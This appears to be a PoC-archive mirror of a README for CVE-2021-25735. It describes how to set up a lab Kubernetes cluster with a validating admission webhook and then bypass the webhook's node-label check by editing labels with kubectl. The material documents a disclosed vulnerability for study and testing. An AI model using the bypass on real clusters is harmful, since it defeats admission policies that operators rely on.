Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-25735 PoC — Validating Admission Webhook does not observe some previous fields

Source
https://github.com/darryk10/CVE-2021-25735
Associated Vulnerability
Title:Validating Admission Webhook does not observe some previous fields (CVE-2021-25735)
Description:A security issue was discovered in kube-apiserver that could allow node updates to bypass a Validating Admission Webhook. Clusters are only affected by this vulnerability if they run a Validating Admission Webhook for Nodes that denies admission based at least partially on the old state of the Node object. Validating Admission Webhook does not observe some previous fields.
Description
Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass
Readme
# CVE-2021-25735
## Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass

### Set the Vulnerable Environment

Let's start with running the script gencerts.sh to generate TLS certificates and keys. \
` bash gencerts.sh`

To deploy the admission controller you need to build the Docker container image locally, tag, and push the image to your Dockerhub using the below commands.\
`docker login` \
`docker build -t validationwebhook:1.0 .` \
`docker tag validationwebhook:1.0 darryk/dev:1.0` \
`docker push darryk/dev:1.0`

Now you can deploy the created image with the Node.js application into your K8s cluster. The webhook-deploy.yaml will deploy all the needed components in your cluster. \
`kubectl apply -f webhook-deploy.yaml`

Let's now register our webhook with Kubernetes API Server. To do that, we create a Base64 of the ca.crt file created before and replace the CA_BUNDLE inside webhook-registration.yaml. \
`cat ca.crt | base64`

Finally, we will register the webhook with the Kubernetes API Server. \
`kubectl apply -f webhook-registration.yaml`


### Exploit CVE-2021-25735

We do a change in the node label using edit nodes and we add a new label.\
`kubectl edit nodes ip-172-20-61-82.ec2.internal`

```
  labels:  
    test: test  
    changeAllowed: "false"
```

Since the ChangeAllowed is set to "false" we get the following error:
> error: nodes "ip-172-20-46-130.ec2.internal" could not be patched: admission webhook "validationwebhook.validationwebhook.svc" denied the request: Validation failed
> You can run `kubectl replace -f /tmp/kubectl-edit-irc64.yaml` to try this update again.

If we retry to modify the node performing the following change:\
```
  labels:  
    test: test  
    changeAllowed: "true"
```

In this case the edit action has been accepted bypassing the admission controller.
File Snapshot

 [4.0K]  /data/pocs/c56f6793de8506f85dec651ede1a6f8a82a07077
├── [4.0K]  app
│   ├── [ 362]  package.json
│   ├── [ 14K]  package-lock.json
│   └── [1.4K]  server.js
├── [  17]  ca.srl
├── [ 233]  Dockerfile
├── [ 494]  gencerts.sh
├── [1.0K]  LICENSE
├── [1.8K]  README.md
├── [ 725]  webhook-deploy.yaml
└── [1.8K]  webhook-registration.yaml

1 directory, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →